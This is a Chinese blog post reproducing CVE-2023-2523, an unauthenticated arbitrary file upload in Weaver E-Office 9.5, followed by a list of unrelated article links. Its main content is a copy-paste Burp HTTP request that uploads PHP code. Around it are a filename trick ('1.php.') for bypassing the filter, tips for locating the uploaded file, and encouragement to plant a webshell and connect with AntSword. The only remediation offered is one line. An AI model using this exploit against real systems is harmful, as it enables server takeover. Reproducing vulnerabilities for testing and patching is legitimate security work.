当前位置：首页 > news >正文

泛微 E-Office文件上传漏洞复现

news 2026/2/11 1:48:44

声明
本文仅用于技术交流，请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。
文章作者拥有对此文章的修改和解释权。如欲转载或传播此文章，必须保证此文章的完整性，包括版权声明等全部内容。未经允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。

简介

泛微OA是中国领先的OA办公自动化产品商，是一套集OA、合作、工作流一体化的企业级信息化管理软件。它可以帮助企业实践现办公自动化、信息协同、决策智能化等功能，提升企业生产效率和管理水平，是企业数字化转型和数字化办公的好工具。

泛微OA提供了完整的办公自动化解决方案，包括邮件管理、日程管理、文档管理、签批审查、会议管理、考勤管理、人力资源管理等模块，支持PC端、移动端多种应用场景。同时，它还可以与各种企业管理系统（如ERP、CRM等系统）进行整合，形成完整的业务流程和信息链条。

漏洞概述

漏洞编号 cve-2023-2523

泛微e-office 9.5版本，源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。参数 upload_quwan 的操作导致不受限制的上传，未经身份验证的恶意攻击者通过上传恶意文件，从而获取目标服务器的控制权限。

漏洞利用

poc如下，复制替换burp的请求包

POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
Host: xxx.xxx.xxx.xxx:xxxx
Content-Length: 351
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: LOGIN_LANG=cn; PHPSESSID=a928fd476c924660715ba69920ee6788
Upgrade-Insecure-Requests: 1------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--

重发一下，查看返回信息

这里大家可以看到，返回包中有完整的路径，直接访问

tips：这里1.php.是为了绕过过滤条件，访问的时候不要加php后面的点

正常情况下应该是这样

还有这种情况

盲猜应该是8080或者8088

如果是漏洞环境的话，大家可以尝试放个🐎，我这里就不能给大家演示了

使用蚁剑链接时注意

tips:必须要使用base64编码

最好的情况是使用蚁剑的编码器，之前发表的。

修复建议

升级版本，打补丁

泛微e-office体验服务中心_泛微移动办公OA系统标准版_中小组织办公数字化产品

泛微 E-Office文件上传漏洞复现

简介

漏洞概述

漏洞利用

修复建议

相关文章：

泛微 E-Office文件上传漏洞复现

bug的生命周期

mysql分库分表相关

云原生k8s---资源限制、探针

html2canvas生成图片地址Base64格式转成blob在转成file(二进制)可正常发送(保姆教程,复制粘贴可用)

将Linux上的cpolar内网穿透配置为开机自启动——“cpolar内网穿透”

微信小程序data-item设置获取不到数据的问题

创建百度百科需要什么条件？

【springboot启动报错】java: 错误: 无效的源发行版：17

无涯教程-Perl - setservent函数

Java创建多线程的最全方法

02 qt基本控件及信号和槽

大数据校招学员实习面试分享

用于弥散加权MRI的关节各向异性维纳滤光片研究（Matlab代码实现）

谷粒商城第十一天-品牌管理中关联分类

Selenium自动化测试实战之自动化测试基础

vue3+vite中使用postcss-px-to-viewport适配问题

web测试与app测试的区别

深入理解高并发编程 - 分析创建线程池究竟有哪些方式

Kafka第一课概述与安装

conda相比python好处

R语言AI模型部署方案：精准离线运行详解

Vue2 第一节_Vue2上手_插值表达式{{}}_访问数据和修改数据_Vue开发者工具

【Go】3、Go语言进阶与依赖管理

Module Federation 和 Native Federation 的比较

Java入门学习详细版（一）

让AI看见世界：MCP协议与服务器的工作原理

LangChain知识库管理后端接口：数据库操作详解—— 构建本地知识库系统的基础《二》

无人机侦测与反制技术的进展与应用

CRMEB 中 PHP 短信扩展开发：涵盖一号通、阿里云、腾讯云、创蓝